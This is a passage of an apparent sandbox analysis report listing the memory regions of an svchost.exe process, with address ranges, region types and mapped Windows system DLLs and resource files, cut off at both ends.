= 0x200fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 489 start_va = 0x210000 end_va = 0x21afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 490 start_va = 0x220000 end_va = 0x22cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 491 start_va = 0x230000 end_va = 0x233fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 492 start_va = 0x240000 end_va = 0x249fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 493 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 494 start_va = 0x350000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 495 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 496 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 497 start_va = 0x470000 end_va = 0x473fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 498 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 499 start_va = 0x490000 end_va = 0x493fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 500 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 501 start_va = 0x4b0000 end_va = 0x637fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 502 start_va = 0x640000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 503 start_va = 0x7d0000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 504 start_va = 0x890000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 505 start_va = 0x8c0000 end_va = 0x8cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 506 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 507 start_va = 0x950000 end_va = 0x957fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 508 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 509 start_va = 0x970000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 510 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 511 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 512 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 513 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 514 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 515 start_va = 0x9d0000 end_va = 0x9d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 516 start_va = 0x9e0000 end_va = 0x9e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 517 start_va = 0x9f0000 end_va = 0xa0bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 518 start_va = 0xa10000 end_va = 0xa15fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netcfgx.dll.mui" filename = "\\Windows\\System32\\en-US\\netcfgx.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netcfgx.dll.mui") Region: id = 519 start_va = 0xa20000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 520 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 521 start_va = 0xab0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 522 start_va = 0xac0000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 523 start_va = 0xb40000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 524 start_va = 0xbc0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 525 start_va = 0xbd0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 526 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 527 start_va = 0xbf0000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 528 start_va = 0xc70000 end_va = 0xf3efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 529 start_va = 0xf40000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 530 start_va = 0xfc0000 end_va = 0xfc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 531 start_va = 0xfd0000 end_va = 0xfd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 532 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 533 start_va = 0x1060000 end_va = 0x10c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 534 start_va = 0x10d0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 535 start_va = 0x1150000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 536 start_va = 0x11d0000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 537 start_va = 0x11e0000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 538 start_va = 0x1260000 end_va = 0x12dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 539 start_va = 0x12e0000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 540 start_va = 0x12f0000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012f0000" filename = "" Region: id = 541 start_va = 0x1300000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001300000" filename = "" Region: id = 542 start_va = 0x1310000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001310000" filename = "" Region: id = 543 start_va = 0x1320000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001320000" filename = "" Region: id = 544 start_va = 0x1330000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001330000" filename = "" Region: id = 545 start_va = 0x1340000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001340000" filename = "" Region: id = 546 start_va = 0x1350000 end_va = 0x1357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 547 start_va = 0x1360000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 548 start_va = 0x13f0000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 549 start_va = 0x1470000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 550 start_va = 0x1480000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 551 start_va = 0x1580000 end_va = 0x158ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 552 start_va = 0x1590000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001590000" filename = "" Region: id = 553 start_va = 0x1610000 end_va = 0x161ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 554 start_va = 0x1620000 end_va = 0x169ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001620000" filename = "" Region: id = 555 start_va = 0x16a0000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 556 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 557 start_va = 0x1730000 end_va = 0x1737fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 558 start_va = 0x1740000 end_va = 0x174ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 559 start_va = 0x1750000 end_va = 0x17cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 560 start_va = 0x17d0000 end_va = 0x180ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017d0000" filename = "" Region: id = 561 start_va = 0x1810000 end_va = 0x184ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001810000" filename = "" Region: id = 562 start_va = 0x1850000 end_va = 0x18cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 563 start_va = 0x18d0000 end_va = 0x18dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 564 start_va = 0x18e0000 end_va = 0x18e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018e0000" filename = "" Region: id = 565 start_va = 0x18f0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 566 start_va = 0x1900000 end_va = 0x197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 567 start_va = 0x19b0000 end_va = 0x1a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 568 start_va = 0x1a80000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 569 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 570 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 571 start_va = 0x1d20000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 572 start_va = 0x1db0000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 573 start_va = 0x1e50000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 574 start_va = 0x1f00000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 575 start_va = 0x1fc0000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 576 start_va = 0x2050000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 577 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 578 start_va = 0x2100000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 579 start_va = 0x2190000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 580 start_va = 0x22d0000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 581 start_va = 0x2350000 end_va = 0x240ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 582 start_va = 0x2410000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 583 start_va = 0x24b0000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 584 start_va = 0x2560000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 585 start_va = 0x2600000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 586 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002680000" filename = "" Region: id = 587 start_va = 0x27d0000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 588 start_va = 0x28e0000 end_va = 0x295ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 589 start_va = 0x2960000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 590 start_va = 0x29e0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 591 start_va = 0x29f0000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 592 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 593 start_va = 0x2b40000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 594 start_va = 0x2bd0000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 595 start_va = 0x2ca0000 end_va = 0x2d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 596 start_va = 0x2d20000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 597 start_va = 0x2de0000 end_va = 0x2e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 598 start_va = 0x2ee0000 end_va = 0x2fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 599 start_va = 0x2fe0000 end_va = 0x31dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 600 start_va = 0x3200000 end_va = 0x327ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 601 start_va = 0x32c0000 end_va = 0x333ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 602 start_va = 0x3380000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 603 start_va = 0x3410000 end_va = 0x348ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 604 start_va = 0x34e0000 end_va = 0x355ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 605 start_va = 0x35a0000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 606 start_va = 0x3660000 end_va = 0x36dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 607 start_va = 0x3710000 end_va = 0x378ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 608 start_va = 0x37d0000 end_va = 0x384ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037d0000" filename = "" Region: id = 609 start_va = 0x3850000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 610 start_va = 0x3c50000 end_va = 0x3ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 611 start_va = 0x3cf0000 end_va = 0x3d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 612 start_va = 0x3d90000 end_va = 0x3e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 613 start_va = 0x3e40000 end_va = 0x3ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 614 start_va = 0x3f10000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 615 start_va = 0x3f90000 end_va = 0x400ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f90000" filename = "" Region: id = 616 start_va = 0x4010000 end_va = 0x408ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 617 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 618 start_va = 0x4160000 end_va = 0x425ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004160000" filename = "" Region: id = 619 start_va = 0x4260000 end_va = 0x445ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 620 start_va = 0x4490000 end_va = 0x450ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 621 start_va = 0x4530000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 622 start_va = 0x45b0000 end_va = 0x462ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 623 start_va = 0x4630000 end_va = 0x46affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 624 start_va = 0x46f0000 end_va = 0x476ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 625 start_va = 0x4770000 end_va = 0x486ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 626 start_va = 0x4870000 end_va = 0x496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 627 start_va = 0x4970000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 628 start_va = 0x49f0000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 629 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 630 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 631 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 632 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d00000" filename = "" Region: id = 633 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 634 start_va = 0x4f00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 635 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 636 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 637 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 638 start_va = 0x76ee0000 end_va = 0x76ee6fff monitored = 0 entry_point = 0x76ee106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 639 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 640 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 641 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 642 start_va = 0xffa90000 end_va = 0xffa9afff monitored = 0 entry_point = 0xffa9246c region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 643 start_va = 0x7fef2030000 end_va = 0x7fef2282fff monitored = 0 entry_point = 0x7fef203236c region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 644 start_va = 0x7fef2670000 end_va = 0x7fef2679fff monitored = 0 entry_point = 0x7fef2673994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 645 start_va = 0x7fef4240000 end_va = 0x7fef44b9fff monitored = 0 entry_point = 0x7fef4272200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 646 start_va = 0x7fef4710000 end_va = 0x7fef472bfff monitored = 0 entry_point = 0x7fef47111a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 647 start_va = 0x7fef4730000 end_va = 0x7fef4791fff monitored = 0 entry_point = 0x7fef4731198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 648 start_va = 0x7fef47a0000 end_va = 0x7fef47d9fff monitored = 0 entry_point = 0x7fef47a1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 649 start_va = 0x7fef4e70000 end_va = 0x7fef4ee0fff monitored = 0 entry_point = 0x7fef4eaecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 650 start_va = 0x7fef5f60000 end_va = 0x7fef6031fff monitored = 0 entry_point = 0x7fef5ff1a10 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 651 start_va = 0x7fef6460000 end_va = 0x7fef647cfff monitored = 0 entry_point = 0x7fef6462f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 652 start_va = 0x7fef6490000 end_va = 0x7fef64a4fff monitored = 0 entry_point = 0x7fef6491020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 653 start_va = 0x7fef6830000 end_va = 0x7fef691dfff monitored = 0 entry_point = 0x7fef68312a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 654 start_va = 0x7fef6bf0000 end_va = 0x7fef6c31fff monitored = 0 entry_point = 0x7fef6c20048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 655 start_va = 0x7fef6c40000 end_va = 0x7fef6c59fff monitored = 0 entry_point = 0x7fef6c51ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 656 start_va = 0x7fef6c80000 end_va = 0x7fef6c8efff monitored = 0 entry_point = 0x7fef6c86894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 657 start_va = 0x7fef8790000 end_va = 0x7fef879bfff monitored = 0 entry_point = 0x7fef879602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 658 start_va = 0x7fef8b90000 end_va = 0x7fef8b97fff monitored = 0 entry_point = 0x7fef8b91414 region_type = mapped_file name = "rasadhlp.dll" filename = 